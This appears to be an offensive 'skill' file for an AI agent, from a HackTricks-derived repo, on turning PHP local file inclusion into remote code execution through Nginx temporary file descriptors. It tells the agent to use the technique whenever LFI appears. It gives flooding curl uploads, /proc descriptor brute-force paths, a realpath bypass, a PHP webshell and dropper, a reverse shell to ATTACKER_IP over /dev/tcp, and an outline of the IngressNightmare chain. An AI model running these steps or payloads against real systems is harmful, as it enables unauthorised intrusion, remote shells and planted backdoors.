Hacktricks-skills lfi2rce-nginx-temp-files

How to exploit LFI vulnerabilities to achieve RCE by leveraging Nginx temporary file descriptors. Use this skill whenever you encounter LFI vulnerabilities, need to escalate from file inclusion to code execution, or are investigating nginx reverse proxy configurations with PHP backends. Make sure to use this skill when you see file inclusion parameters, nginx behind PHP-FPM, or need to bypass file path restrictions through /proc filesystem traversal.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/pentesting-web/file-inclusion/lfi2rce-via-nginx-temp-files/SKILL.MD
source content

LFI2RCE via Nginx Temp Files

This skill teaches you how to escalate Local File Inclusion (LFI) vulnerabilities to Remote Code Execution (RCE) by exploiting how Nginx handles temporary files when buffering request bodies.

When to Use This Technique

Use this approach when:

  • You have an LFI vulnerability (e.g.,
    ?file=
    ,
    ?path=
    ,
    ?include=
    parameters)
  • The backend is PHP running behind an Nginx reverse proxy
  • You need to execute arbitrary code but can only include files
  • Standard file paths are restricted or filtered

The Vulnerability Explained

Nginx buffers request bodies to disk when they exceed the in-memory buffer (≈8KB by default). These temp files are written to paths like

/var/lib/nginx/body
or
/tmp/nginx/client-body
. The key insight:

  1. Nginx writes the temp file and immediately unlinks it (deletes the filename)
  2. The file descriptor remains open as long as the request is in progress
  3. The descriptor is accessible via
    /proc/<nginx_pid>/fd/<fd>
  4. PHP's
    include
    /
    require
    follows these symlinks, allowing you to execute the buffered content

Exploitation Workflow

Step 1: Enumerate Nginx Worker PIDs

Find the PIDs of nginx worker processes by reading

/proc/<pid>/cmdline
through your LFI:

?file=/proc/1/cmdline
?file=/proc/2/cmdline
...

Look for strings containing

nginx: worker process
. Worker count rarely exceeds CPU count, so scan PIDs 100-4000.

Tip: Use the bundled

scan_nginx_pids.py
script to automate this if you have command execution elsewhere.

Step 2: Force Nginx to Create Temp Files

Send large POST/PUT bodies (>8KB) to trigger disk buffering:

# Generate a large payload with your exploit code
curl -X POST http://target/vulnerable.php \
  -H "Content-Length: 1048576" \
  --data-binary @payload.txt \
  --max-time 60

Critical: Keep the connection alive or hang the upload so nginx keeps the file descriptor open. Don't complete the request immediately.

Step 3: Map File Descriptors to Temp Files

With the nginx PIDs, brute-force file descriptors (typically 10-45 for body temp files):

?file=/proc/<pid>/fd/10
?file=/proc/<pid>/fd/11
...

When you hit the right descriptor, you'll see your payload content or get execution.

Bypass realpath(): If PHP normalizes paths, use traversal chains:

?file=/proc/<pidA>/cwd/proc/<pidB>/root/proc/<pidC>/fd/<fd>

Step 4: Include for Execution

Once you find the descriptor pointing to your buffered payload:

// Your payload in the POST body
<?php system($_GET['cmd']); ?>

// Then include it via LFI
?file=/proc/1234/fd/15&cmd=id

The

include
executes your PHP code even though the original temp file was unlinked.

Modern Variations (2024-2025)

CVE-2025-1974 (IngressNightmare) Pattern

Ingress controllers and service meshes expose similar attack surfaces:

  1. Push a malicious shared object as request body (>8KB)
  2. Lie in
    Content-Length
    header (claim 1MB, never send last chunk)
  3. Temp file stays pinned for ~60 seconds
  4. Brute-force
    /proc/<pid>/fd/<fd>
    to find the buffered .so
  5. Inject
    ssl_engine /proc/<pid>/fd/<fd>;
    into nginx config
  6. Constructors in the shared object yield RCE

Kubernetes Context

The primitive is the same in orchestrators:

  • Find a way to drop bytes into nginx buffers
  • Walk
    /proc
    from anywhere you can issue filesystem reads
  • Privilege boundaries differ but the core technique remains

Practical Tips

Check if Buffering is Enabled

Before attempting exploitation, verify nginx buffering is active:

# Check response headers for buffering indicators
curl -I http://target/ | grep -i x-nginx

# Try to read nginx config via LFI
?file=/etc/nginx/nginx.conf
?file=/etc/nginx/conf.d/*.conf

Look for:

  • proxy_request_buffering on
    (default)
  • client_body_buffer_size
    (default ~8KB)
  • proxy_max_temp_file_size
    (0 disables temp files)

Hanging Uploads

Hanging uploads are noisy but effective:

# Use multiple processes to flood workers
for i in {1..10}; do
  curl -X POST http://target/ \
    -H "Content-Length: 1048576" \
    --data-binary @payload.txt \
    --max-time 120 &
done

At least one temp file should stay around long enough for your LFI brute force.

Use the Procfs Scanner

If you have any code execution primitive, run the bundled scanner:

python3 scan_nginx_pids.py

This outputs usable LFI paths like

?file=/proc/1234/fd/15
.

Payload Examples

PHP Shell

<?php
if (isset($_GET['cmd'])) {
    system($_GET['cmd']);
}
?>

Reverse Shell

<?php
$sock=fsockopen('ATTACKER_IP',4444);
exec('/bin/bash -i < /dev/tcp/ATTACKER_IP/4444 > /dev/tcp/ATTACKER_IP/4444 2>&1');
?>

Webshell Upload

<?php
file_put_contents('/tmp/shell.php', '<?php system($_GET["c"]); ?>');
?>

Labs and Practice

References

Common Pitfalls

  1. Buffering disabled: If
    proxy_request_buffering off
    or
    proxy_max_temp_file_size 0
    , this technique won't work
  2. PID race conditions: Nginx workers may restart; scan PIDs frequently
  3. Descriptor range: File descriptors 10-45 are typical for body temp files, but check your target
  4. Connection timeout: Keep uploads hanging long enough for the LFI brute force to complete
  5. SELinux/AppArmor: May block /proc access; check security contexts

When This Won't Work

  • Nginx buffering is explicitly disabled
  • PHP has
    open_basedir
    restrictions blocking /proc
  • The LFI parameter is heavily filtered (e.g., blocks
    /proc
    )
  • Running in a container without /proc mounted
  • Nginx is not the reverse proxy (Apache, Caddy, etc. behave differently)